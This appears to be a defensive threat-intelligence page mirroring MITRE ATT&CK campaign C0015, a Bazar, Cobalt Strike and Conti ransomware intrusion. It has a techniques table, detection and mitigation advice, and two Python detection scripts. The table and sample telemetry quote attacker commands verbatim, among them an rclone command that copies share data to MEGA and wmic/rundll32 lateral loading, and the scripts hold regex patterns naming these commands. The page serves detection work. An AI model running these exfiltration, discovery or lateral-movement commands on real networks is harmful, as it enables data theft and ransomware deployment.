C0015: C0015
C0015 was a ransomware intrusion during which the unidentified attackers used Bazar, Cobalt Strike, and Conti, along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated Conti ransomware playbook based on the observed pattern of activity and operator errors.[1]
Analyst context for executives and security teams
C0015 matters because it represents a fast ransomware intrusion pattern: unidentified attackers used Bazar, Cobalt Strike, Conti, and other tools over a five-day period, with activity assessed by researchers as consistent with the widely circulated Conti ransomware playbook. For leaders, the decision value is not the campaign name; it is whether the organization can detect and contain downloader/backdoor activity, post-exploitation tooling, Active Directory discovery, lateral movement, data staging/exfiltration preparation, and ransomware deployment before business operations are disrupted.
Executive priority
Treat this as a resilience and incident-readiness benchmark for ransomware defense. Executives should ask whether SOC, identity, endpoint, network, and backup teams can work from a shared ransomware playbook during a compressed multi-day intrusion. Priority should go to validating visibility across Windows administration activity, Active Directory enumeration, RDP/WMI use, tool transfer, data collection from local systems and shares, staging, and cloud-storage sync tooling such as Rclone, which in C0015 was used to push share contents to MEGA. Because ATT&CK provides no official detection text for this campaign, local evidence and tested response procedures are essential for audit confidence and operational readiness.
Technical view
For SOC and IR teams, C0015 should be mapped as a campaign-level scenario involving Bazar, Cobalt Strike, Conti, AdFind, Rclone, and AnyDesk, plus techniques including a macro-enabled Word attachment, HTA execution via mshta, command shell, Visual Basic, JavaScript, WMI, rundll32 and regsvr32 proxy execution, RDP, process/file/network and domain trust discovery, local and domain group discovery, local and network-share data collection, local staging, ingress and lateral tool transfer, Base64 obfuscation, masquerading, DLL injection, and bandwidth-limited exfiltration to cloud storage. Validate whether detections correlate early-stage downloader/backdoor behavior with follow-on discovery, credentialed remote access, administrative execution, file staging, and exfiltration-preparation signals rather than treating each alert in isolation.
Likely telemetry
- Endpoint process creation and command-line logging for cmd, scripting, discovery commands, AdFind-like LDAP queries, and renamed or suspicious utilities
- Windows event telemetry for RDP logons, WMI activity, remote execution, local and domain group enumeration, and administrative access patterns
- EDR telemetry for DLL injection, process relationships, suspicious child processes, obfuscated files, masquerading, and tool transfer
- Network telemetry for Cobalt Strike-like command-and-control patterns, unusual outbound connections, ingress tool downloads, and bandwidth-throttled uploads to cloud storage (in C0015, Rclone to MEGA with `--bwlimit`)
- File system telemetry for sensitive-file discovery, access to local data sources, network share access, bulk copy activity, and local staging directories
Detection direction
- Build correlation around the intrusion sequence: downloader/backdoor presence, tool transfer, discovery, privilege or identity-focused enumeration, lateral movement via RDP/WMI, collection/staging, and ransomware tooling.
- Tune for legitimate administration overlap. RDP, WMI, command shell, group enumeration, and file copy activity are common in enterprise operations, so detections should account for user role, host criticality, time of day, source/destination pairings, and change windows.
- Validate visibility for Active Directory discovery, especially AdFind-like behavior and domain/local group enumeration, because these signals often decide whether defenders can see ransomware operators preparing lateral movement.
- Look for gaps around network shares and data staging. Many environments monitor malware execution better than bulk file access, staging directories, archive preparation, or sync-tool usage.
- Because official ATT&CK detection guidance is not provided for C0015, use the related software and techniques as coverage requirements and test them with internal purple-team or detection validation exercises.
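To make the correlation point concrete, the following is an added example (not code from the ATT&CK page or the DFIR report) that scores process-creation events per host against the discovery, proxy-execution, remote-access and exfiltration-tooling commands documented in the techniques table below, and alerts only when several distinct stages land on one host inside the campaign's five-day window. The regular expressions, the stage grouping, the allowlist mechanism, and every hostname, user and file path in the sample telemetry are this example's assumptions.

```python
"""Stage-correlation rule for a C0015-style intrusion, run over constructed
process-creation events (Sysmon EID 1 / Security 4688 style fields)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Stage -> [(regex over the command line, ATT&CK technique ID)].
# Technique IDs and command shapes come from the campaign page; the regexes
# themselves are this example's assumptions about how they appear in telemetry.
STAGE_PATTERNS = {
    "discovery": [
        (r'\bnet\s+group\s+"?domain admins"?\s+/dom', "T1069.002"),
        (r'\bnet\s+localgroup\s+"?admini?strators?"?', "T1069.001"),  # also catches the "adminstrator" typo
        (r"\bnltest\b.*/domain_trusts", "T1482"),
        (r"\bnet\s+view\s+/all", "T1018"),
        (r"\btasklist\b.*\s/s\b", "T1057"),
        (r"sharefinder", "T1135"),
    ],
    "execution_proxy": [
        (r"\bwmic(\.exe)?\b.*(?:/node:|rundll32)", "T1047"),  # assumed shape of the wmic + rundll32 loader
        (r"\brundll32(\.exe)?\b", "T1218.011"),
        (r"\bregsvr32(\.exe)?\b", "T1218.010"),
        (r"\bmshta(\.exe)?\b", "T1218.005"),
    ],
    "remote_access": [(r"\banydesk(\.exe)?\b", "T1219.002")],
    "exfil_tooling": [(r"\brclone(\.exe)?\b", "T1567.002")],
}
COMPILED = [(stage, re.compile(rx, re.IGNORECASE), tid)
            for stage, pats in STAGE_PATTERNS.items() for rx, tid in pats]


def classify(cmdline):
    """Return every (stage, technique) pair a single command line matches."""
    return [(stage, tid) for stage, rx, tid in COMPILED if rx.search(cmdline)]


def correlate(events, window=timedelta(days=5), min_stages=3, allowlist=frozenset()):
    """Flag hosts where at least `min_stages` distinct stages fall inside one
    sliding `window`. `allowlist` holds (host, user) pairs whose activity is
    expected administration (change windows, jump hosts) and is skipped."""
    per_host = defaultdict(list)
    for ev in events:
        if (ev["host"], ev["user"]) in allowlist:
            continue
        for stage, tid in classify(ev["cmd"]):
            per_host[ev["host"]].append((ev["ts"], stage, tid))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        best = None
        for i, (start, _, _) in enumerate(hits):  # each hit opens a candidate window
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            stages = {s for _, s, _ in in_window}
            if len(stages) >= min_stages and (best is None or len(stages) > len(best["stages"])):
                best = {"stages": sorted(stages),
                        "techniques": sorted({t for _, _, t in in_window}),
                        "first": start, "last": in_window[-1][0]}
        if best:
            alerts[host] = best
    return alerts


def _ev(ts, host, user, cmd):
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd}


# Constructed sample telemetry; hostnames, users, paths and the DLL entry point are invented.
SAMPLE_EVENTS = [
    _ev("2021-11-01T09:02:00", "WS01", "jdoe", r"mshta.exe C:\Users\jdoe\AppData\Local\Temp\invoice.hta"),
    _ev("2021-11-01T09:15:00", "WS01", "jdoe", 'cmd.exe /c net group "domain admins" /dom'),
    _ev("2021-11-01T09:16:00", "WS01", "jdoe", "nltest /domain_trusts /all_trusts"),
    _ev("2021-11-01T09:17:00", "WS01", "jdoe", 'net localgroup "adminstrator"'),
    _ev("2021-11-02T14:40:00", "WS01", "jdoe", r'wmic /node:FS01 process call create "rundll32.exe C:\ProgramData\D8B3.dll,Entry"'),
    _ev("2021-11-03T08:10:00", "WS01", "jdoe", r"C:\ProgramData\AnyDesk.exe"),
    _ev("2021-11-03T22:05:00", "WS01", "jdoe", r'rclone.exe copy --max-age 2y "\\FS01\Shares" Mega:DATA -q --bwlimit 10M'),
    _ev("2021-11-01T10:00:00", "ADMIN-JUMP", "svc_admin", 'net group "domain admins" /dom'),   # routine admin work
    _ev("2021-11-01T11:00:00", "FS01", "SYSTEM", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for host, a in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {len(a['stages'])} stages {a['stages']} between {a['first']} and {a['last']}")
        print("  techniques:", ", ".join(a["techniques"]))
```

Only WS01 fires: it shows four stages (proxy execution, discovery, remote access, exfiltration tooling) in under three days, while the jump host's single domain-admin enumeration and the file server's ordinary rundll32 use stay below the threshold. Lowering `min_stages` to 1 turns the rule into a noisy single-indicator alert, which is the overlap with legitimate administration the tuning note above warns about; the allowlist shows one way to suppress known administrative sources without dropping the underlying telemetry.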
Mitigation priorities
- Prioritize identity and administrative access controls: restrict and monitor RDP/WMI, enforce least privilege, and review local/domain admin exposure.
- Harden endpoint execution paths by controlling script execution, suspicious command-line use, unauthorized remote access tools, and unapproved file-transfer or cloud-sync utilities.
- Improve segmentation and lateral movement resistance around critical servers, file shares, backup infrastructure, and administrative workstations.
- Prepare ransomware-specific response actions: rapid endpoint isolation, account disablement, evidence preservation, backup validation, and executive decision triggers.
- Use this campaign as a tabletop and detection-engineering scenario to prove that SOC, IR, identity, infrastructure, and business-continuity teams can respond within a compressed multi-day intrusion window.
Analyst notes and limits
The strongest defensive lesson from C0015 is sequence awareness. The campaign description and relationships point to a ransomware intrusion involving Bazar, Cobalt Strike, Conti, AdFind, Rclone, discovery, remote execution, lateral movement, collection, staging, and exfiltration-related behavior. The campaign’s actors are unidentified in the supplied ATT&CK fields, so attribution should not drive prioritization; readiness against the behavior should.
ATT&CK does not provide official detection text, campaign-level platforms, or tactics for C0015 in the supplied object. Platform references come only from related software and technique objects. This summary does not assert current activity, customer exposure, or guaranteed detection coverage; organizations must validate against their own telemetry, controls, and incident history.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
The table follows the MITRE layout of scannable group, software, campaign, and technique relationships. Relationship notes come from mirrored ATT&CK relationship text where available; rows with an empty relationship cell have no mirrored procedure text. All procedure notes cite [1].
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1135 | Network Share Discovery | During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.[1] |
| Enterprise | T1047 | Windows Management Instrumentation | During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.[1] |
| Enterprise | T1083 | File and Directory Discovery | During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.[1] |
| Enterprise | T1553.002 | Code Signing | For C0015, the threat actors used DLL files that had invalid certificates.[1] |
| Enterprise | T1567.002 | Exfiltration to Cloud Storage | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.[1] |
| Enterprise | T1204.002 | Malicious File | During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.[1] |
| Enterprise | T1074.001 | Local Data Staging | During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.[1] |
| Enterprise | T1218.011 | Rundll32 | During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.[1] |
| Enterprise | T1566.001 | Spearphishing Attachment | For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.[1] |
| Enterprise | T1005 | Data from Local System | During C0015, the threat actors obtained files and data from the compromised network.[1] |
| Enterprise | T1069.001 | Local Groups | During C0015, the threat actors used the command `net localgroup "adminstrator" ` (typo as observed) to identify accounts with local administrator rights.[1] |
| Enterprise | T1057 | Process Discovery | During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.[1] |
| Enterprise | T1069.002 | Domain Groups | During C0015, the threat actors used the command `net group "domain admins" /dom` to enumerate domain groups.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | During C0015, the threat actors downloaded additional tools and files onto a compromised network.[1] |
| Enterprise | T1055.001 | Dynamic-link Library Injection | During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.[1] |
| Enterprise | T1059.005 | Visual Basic | During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.[1] |
| Enterprise | T1486 | Data Encrypted for Impact | |
| Enterprise | T1027 | Obfuscated Files or Information | During C0015, the threat actors used Base64-encoded strings.[1] |
| Enterprise | T1059.003 | Windows Command Shell | During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.[1] |
| Enterprise | T1218.010 | Regsvr32 | During C0015, the threat actors employed code that used `regsvr32` for execution.[1] |
| Enterprise | T1588.001 | Malware | For C0015, the threat actors used Cobalt Strike and Conti ransomware.[1] |
| Enterprise | T1021.001 | Remote Desktop Protocol | During C0015, the threat actors used RDP to access specific network hosts of interest.[1] |
| Enterprise | T1124 | System Time Discovery | During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network.[1] |
| Enterprise | T1030 | Data Transfer Size Limits | |
| Enterprise | T1219.002 | Remote Desktop Software | During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.[1] |
| Enterprise | T1039 | Data from Network Shared Drive | During C0015, the threat actors collected files from network shared drives prior to network encryption.[1] |
| Enterprise | T1570 | Lateral Tool Transfer | During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.[1] |
| Enterprise | T1018 | Remote System Discovery | During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.[1] |
| Enterprise | T1016 | System Network Configuration Discovery | During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.[1] |
| Enterprise | T1588.002 | Tool | |
| Enterprise | T1059.007 | JavaScript | During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.[1] |
| Enterprise | T1036 | Masquerading | During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.[1] |
| Enterprise | T1482 | Domain Trust Discovery | During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.[1] |
| Enterprise | T1218.005 | Mshta | During C0015, the threat actors used `mshta` to execute DLLs.[1] |
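The Rclone command in the T1567.002 row carries more signal than the binary name alone: the destination is an rclone remote (`Mega:DATA`) rather than a UNC path or drive letter, the source is a network share (the T1039 row), and `--bwlimit` throttles the upload (the T1030 row). The following added example, which is not code from the ATT&CK page or the DFIR report, tokenises such a command line and maps those switches to the technique IDs in the table. The set of value-taking switches, the regular expressions, and the benign backup command used for comparison are this example's assumptions.

```python
"""Parse an rclone command line from process telemetry and map its switches to
the behaviours the C0015 page documents (T1567.002, T1039, T1030)."""
import re
import shlex

RCLONE_BIN = re.compile(r"(?:^|[\\/])rclone(?:\.exe)?$", re.IGNORECASE)
REMOTE_RE = re.compile(r"^(?P<name>[A-Za-z0-9_-]+):(?P<path>.*)$")   # rclone "remote:path"
WINDOWS_DRIVE_RE = re.compile(r"^[A-Za-z]:(?:[\\/]|$)")              # C:\... is a local drive, not a remote
UNC_RE = re.compile(r"^\\\\[^\\]+\\")                                # \\server\share
TRANSFER_CMDS = {"copy", "copyto", "sync", "move", "moveto"}
# Switches that consume the next token. Assumption: this subset covers the command
# shapes seen in ransomware intrusions; unknown switches are treated as booleans.
VALUE_FLAGS = {"--max-age", "--min-age", "--max-size", "--min-size", "--bwlimit",
               "--transfers", "--checkers", "--multi-thread-streams", "--include",
               "--exclude", "--filter", "--config"}
SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)([bkmgtp]?)$", re.IGNORECASE)
# rclone's --bwlimit unit defaults to KiB/s when no suffix is given.
UNIT = {"": 1024, "b": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3, "t": 1024 ** 4, "p": 1024 ** 5}


def _unquote(tok):
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'" else tok


def parse_bwlimit(value):
    """Bytes per second for an rclone --bwlimit spec. 'up:down' forms take the
    upload side; timetable forms are not handled and raise ValueError."""
    m = SIZE_RE.match(value.split(":")[0])
    if not m:
        raise ValueError(f"unrecognised --bwlimit value {value!r}")
    return int(float(m.group(1)) * UNIT[m.group(2).lower()])


def parse_rclone(cmdline):
    """Return None if the binary is not rclone, else a dict with the subcommand,
    source, destination and a flag map. Non-POSIX shlex keeps Windows backslashes intact."""
    tokens = [_unquote(t) for t in shlex.split(cmdline, posix=False)]
    if not tokens or not RCLONE_BIN.search(tokens[0]):
        return None
    parsed = {"binary": tokens[0], "subcommand": None, "source": None, "dest": None, "flags": {}}
    positional, i = [], 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-"):
            if "=" in tok:
                name, value = tok.split("=", 1)
                parsed["flags"][name] = value
            elif tok in VALUE_FLAGS and i + 1 < len(tokens):
                parsed["flags"][tok] = tokens[i + 1]
                i += 1
            else:
                parsed["flags"][tok] = True
        else:
            positional.append(tok)
        i += 1
    if positional:
        parsed["subcommand"] = positional[0].lower()
        parsed["source"] = positional[1] if len(positional) > 1 else None
        parsed["dest"] = positional[2] if len(positional) > 2 else None
    return parsed


def assess(parsed):
    """Map a parsed rclone invocation to (technique, detail) findings."""
    findings = []
    if parsed["subcommand"] in TRANSFER_CMDS:
        dest, source = parsed["dest"] or "", parsed["source"] or ""
        m = REMOTE_RE.match(dest)
        if m and not WINDOWS_DRIVE_RE.match(dest) and not UNC_RE.match(dest):
            findings.append(("T1567.002", f"transfer to rclone remote '{m['name']}' (path '{m['path']}')"))
        if UNC_RE.match(source):
            findings.append(("T1039", f"source is the network share {source}"))
    if "--bwlimit" in parsed["flags"]:
        findings.append(("T1030", f"upload throttled to {parse_bwlimit(parsed['flags']['--bwlimit'])} bytes/s"))
    if "--max-age" in parsed["flags"]:
        findings.append(("note", f"only files newer than {parsed['flags']['--max-age']} are selected"))
    return findings


# The command documented on the campaign page (T1567.002 row), kept verbatim.
C0015_RCLONE = (r'rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing '
                r'--auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M')
# Constructed benign comparison: a local backup job to a NAS share.
BENIGN_BACKUP = r'rclone.exe sync D:\Backups \\NAS\backup --bwlimit 50M --transfers 4'

if __name__ == "__main__":
    for label, cmd in (("C0015", C0015_RCLONE), ("benign backup", BENIGN_BACKUP)):
        print(label, "->", assess(parse_rclone(cmd)))
```

Two caveats follow from the table itself. The T1036 row shows the actors renaming a binary to `compareForfor.jpg`, so matching on the `rclone` filename misses a renamed copy; in a real pipeline key the rule on the image hash or the PE `OriginalFileName` field instead. And `--bwlimit` by itself is weak evidence, as the constructed backup job shows: it is the combination of a cloud remote as destination, a share as source, and throttling that reproduces the C0015 pattern.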
Groups, software, and campaigns
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0552: AdFind
S0575: Conti
Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.[1][2][3]
S1040: Rclone
S0534: Bazar
Bazar is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. Bazar reportedly has ties to TrickBot campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 39d32cb0180d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] DFIR Conti Bazar Nov 2021. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
[2] mitre-attack C0015. MITRE ATT&CK source record for campaign C0015.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.